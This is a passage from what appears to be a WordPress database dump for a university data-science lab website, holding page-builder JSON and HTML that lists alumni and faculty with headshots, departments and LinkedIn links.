Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c181\",\"index\":1,\"id\":\"182-c185\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c186\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1786,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c186\",\"index\":2,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c186\",\"index\":1,\"id\":\"182-c190\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c191\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1788,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c191\",\"index\":2,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c191\",\"index\":1,\"id\":\"182-c195\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c196\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1790,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c196\",\"index\":2,\"id\":\"182-c199\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c196\",\"index\":1,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c201\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c201\",\"index\":0,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1792,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c201\",\"index\":0,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c201\",\"index\":2,\"id\":\"182-c204\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c205\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1794,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c205\",\"index\":2,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c205\",\"index\":1,\"id\":\"182-c209\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c210\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c211\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1795,\"size\":\"\"},\"domuuid\":\"182-c161\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c212\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Eliza Schuh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c210\",\"index\":2,\"id\":\"182-c213\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/search\\/results\\/all\\/?fetchDeterministicClustersOnly=true&heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&keywords=eliza%20schuh&origin=RICH_QUERY_TYPEAHEAD_HISTORY&position=0&searchId=e7657352-5ea3-4501-b984-d21542771bc4&sid=WW)&spellCorrectionEnabled=true\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c210\",\"index\":1,\"id\":\"182-c214\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c215\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c216\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bronson-e1697209357897.png\",\"caption\":{\"text\":\"\"},\"imageId\":1797,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c217\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c215\",\"index\":2,\"id\":\"182-c218\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c215\",\"index\":1,\"id\":\"182-c219\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c226\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c226\",\"index\":0,\"id\":\"182-c227\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Angelique-e1697207062254.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1757,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c226\",\"index\":0,\"id\":\"182-c228\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c226\",\"index\":2,\"id\":\"182-c229\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c226\",\"index\":1,\"id\":\"182-c230\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c237\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c237\",\"index\":0,\"id\":\"182-c238\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1763,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c237\",\"index\":0,\"id\":\"182-c239\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c237\",\"index\":2,\"id\":\"182-c240\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c237\",\"index\":1,\"id\":\"182-c241\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c165\",\"parentId\":\"182-c164\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c164\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c222\",\"parentId\":\"182-c221\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c221\",\"parentId\":\"182-c220\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c220\",\"parentId\":\"182-c164\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2024-11-07 14:20:44','2024-11-07 19:20:44','',562,'https://gsudice.dataconn.net/?p=1861',0,'revision','',0),(1862,1,'2024-11-07 14:20:44','2024-11-07 19:20:44','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c70\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c70 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c71-outer\">\n            <div data-colibri-id=\"182-c71\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c71 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c72\" class=\"h-global-transition-all h-heading style-986 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c72\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 